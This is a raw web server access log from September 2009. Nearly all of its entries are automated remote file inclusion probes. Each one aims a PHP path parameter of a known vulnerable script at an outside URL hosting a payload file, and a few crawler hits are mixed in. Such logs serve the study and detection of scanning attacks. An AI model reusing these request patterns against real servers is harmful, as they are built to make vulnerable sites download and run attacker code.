123.242.165.138 - - [06/Sep/2009:23:01:19 -0500] "GET /index.php?vwar_root=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
222.122.72.216 - - [06/Sep/2009:23:01:33 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.122.72.216 - - [06/Sep/2009:23:01:33 -0500] "GET /errors.php?error=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.122.72.216 - - [06/Sep/2009:23:01:33 -0500] "GET /logs/errors.php?error=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.122.72.216 - - [06/Sep/2009:23:02:36 -0500] "GET /logs/access_log.1236470400/errors.php?error=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:23:03:48 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:23:03:48 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:23:03:48 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.55.106.161 - - [06/Sep/2009:23:09:02 -0500] "GET /logs/access_log.1175472000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.29.82.154 - - [06/Sep/2009:23:13:18 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
99.198.106.178 - - [06/Sep/2009:23:21:08 -0500] "GET /logs/errors.php?error=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
99.198.106.178 - - [06/Sep/2009:23:21:08 -0500] "GET /errors.php?error=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
99.198.106.178 - - [06/Sep/2009:23:21:08 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
99.198.106.178 - - [06/Sep/2009:23:22:04 -0500] "GET /logs/access_log.1236470400/errors.php?error=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.84.169.161 - - [06/Sep/2009:23:25:20 -0500] "GET /logs/access_log.1237075200/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.84.169.161 - - [06/Sep/2009:23:25:20 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
219.84.169.161 - - [06/Sep/2009:23:25:22 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:25:46 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:25:46 -0500] "GET /logs/access_log.1234051200//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:25:46 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
219.84.169.161 - - [06/Sep/2009:23:26:03 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
219.84.169.161 - - [06/Sep/2009:23:26:03 -0500] "GET /logs/access_log.1241222400/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
219.84.169.161 - - [06/Sep/2009:23:26:05 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:23:26:39 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:23:26:40 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:23:26:40 -0500] "GET /logs/access_log.1237075200//include/admin.lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.18.236.8 - - [06/Sep/2009:23:27:04 -0500] "GET /logs/access_log.1237075200/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.18.236.8 - - [06/Sep/2009:23:27:07 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.18.236.8 - - [06/Sep/2009:23:27:23 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
219.84.169.161 - - [06/Sep/2009:23:27:24 -0500] "GET /logs/access_log.1236211200/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.18.236.8 - - [06/Sep/2009:23:28:31 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.18.236.8 - - [06/Sep/2009:23:28:31 -0500] "GET /logs/access_log.1241222400/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.18.236.8 - - [06/Sep/2009:23:28:40 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:29:41 -0500] "GET /logs//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:29:41 -0500] "GET //plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:29:41 -0500] "GET /logs/access_log.1236038400//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:34:45 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:34:45 -0500] "GET /logs/access_log.1241222400%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:34:45 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:34:53 -0500] "GET /logs//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:34:53 -0500] "GET //components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:34:53 -0500] "GET /logs/access_log.1239580800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:34:56 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:34:56 -0500] "GET /logs/access_log.1241222400%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:34:56 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:34:59 -0500] "GET //components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:34:59 -0500] "GET /logs/access_log.1239580800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:34:59 -0500] "GET /logs//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:35:00 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:35:00 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:23:35:01 -0500] "GET /logs/access_log.1241222400%20%20//index.php?DOCUMENT_ROOT=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.100.9.220 - - [06/Sep/2009:23:35:17 -0500] "GET /logs//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
61.100.9.220 - - [06/Sep/2009:23:35:17 -0500] "GET /logs/access_log.1239580800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
61.100.9.220 - - [06/Sep/2009:23:35:17 -0500] "GET //components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.9.220 - - [06/Sep/2009:23:35:47 -0500] "GET //components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.9.220 - - [06/Sep/2009:23:35:47 -0500] "GET /logs//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
61.100.9.220 - - [06/Sep/2009:23:35:47 -0500] "GET /logs/access_log.1239580800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.207.52 - - [06/Sep/2009:23:37:32 -0500] "GET /logs/access_log.1179187200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [06/Sep/2009:23:39:01 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:23:39:03 -0500] "GET /logs/access_log.1244505600//include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
219.85.63.226 - - [06/Sep/2009:23:39:03 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.106.235 - - [06/Sep/2009:23:40:04 -0500] "GET /logs/access_log.1199577600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.115.89.97 - - [06/Sep/2009:23:40:48 -0500] "GET /logs//inc/include.php?language=0&lang_settings[0][1]=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:40:48 -0500] "GET /logs/access_log.1234915200//inc/include.php?language=0&lang_settings[0][1]=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:40:48 -0500] "GET //inc/include.php?language=0&lang_settings[0][1]=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:40:54 -0500] "GET /logs/access_log.1236384000//inc/include.php?language=0&lang_settings[0][1]=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.114.225.248 - - [06/Sep/2009:23:45:27 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
210.114.225.248 - - [06/Sep/2009:23:45:28 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
210.114.225.248 - - [06/Sep/2009:23:45:30 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
210.114.225.248 - - [06/Sep/2009:23:46:05 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
87.139.66.104 - - [06/Sep/2009:23:46:14 -0500] "GET /logs/access_log.1241222400/admin.googlebase.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.139.66.104 - - [06/Sep/2009:23:46:14 -0500] "GET /admin.googlebase.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
87.139.66.104 - - [06/Sep/2009:23:46:22 -0500] "GET /logs/admin.googlebase.php?mosConfig_absolute_path=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
87.118.116.55 - - [06/Sep/2009:23:46:49 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.118.116.55 - - [06/Sep/2009:23:46:49 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
87.118.116.55 - - [06/Sep/2009:23:46:51 -0500] "GET /logs/access_log.1244764800/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
87.118.116.55 - - [06/Sep/2009:23:47:34 -0500] "GET /logs/access_log.1248048000/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:22 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:22 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:22 -0500] "GET /logs/access_log.1243814400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:23 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:23 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:23 -0500] "GET /logs/access_log.1243814400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:25 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:25 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:25 -0500] "GET /logs/access_log.1243814400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:25 -0500] "GET /logs/access_log.1243814400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:25 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:49:25 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:26 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:27 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:27 -0500] "GET /logs/access_log.1243814400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:30 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:30 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:30 -0500] "GET /logs/access_log.1243814400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:31 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:31 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:31 -0500] "GET /logs/access_log.1243814400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:31 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:31 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:31 -0500] "GET /logs/access_log.1246579200//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:31 -0500] "GET /logs/access_log.1243814400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:34 -0500] "GET /logs/access_log.1246579200//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:36 -0500] "GET /logs/access_log.1246579200//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:23:50:39 -0500] "GET /logs/access_log.1246579200//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 381 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:51:31 -0500] "GET /logs/access_log.1236211200//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:51:31 -0500] "GET //?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:51:32 -0500] "GET /logs//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:51:38 -0500] "GET /logs/access_log.1236038400//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.218.40.180 - - [06/Sep/2009:23:52:16 -0500] "GET //administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.pekam.gr//administrator/components/com_x-shop/languages/1.gif?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
211.204.148.251 - - [06/Sep/2009:23:54:41 -0500] "GET /logs//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.204.148.251 - - [06/Sep/2009:23:54:41 -0500] "GET //components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.204.148.251 - - [06/Sep/2009:23:54:41 -0500] "GET /logs/access_log.1236211200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:55:18 -0500] "GET /logs/access_log.1239062400//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:55:26 -0500] "GET /logs/access_log.1238198400//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:55:38 -0500] "GET /logs/access_log.1236211200//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:55:38 -0500] "GET //?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:55:38 -0500] "GET /logs/access_log.1236038400//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.115.89.97 - - [06/Sep/2009:23:55:40 -0500] "GET /logs//?_zb_path=http://www.washingtontruth.com/nGagLiks/zfxid.txt? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:55:41 -0500] "GET /logs/access_log.1246579200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:55:48 -0500] "GET /logs/access_log.1238716800//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:55:48 -0500] "GET /logs/access_log.1239753600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:55:48 -0500] "GET /logs/access_log.1248048000//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:56:39 -0500] "GET /logs/access_log.1243123200//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:56:39 -0500] "GET /logs/access_log.1240185600//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.78.225.23 - - [06/Sep/2009:23:56:39 -0500] "GET /logs/access_log.1242864000//components/com_flyspray/stardown.php?file=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
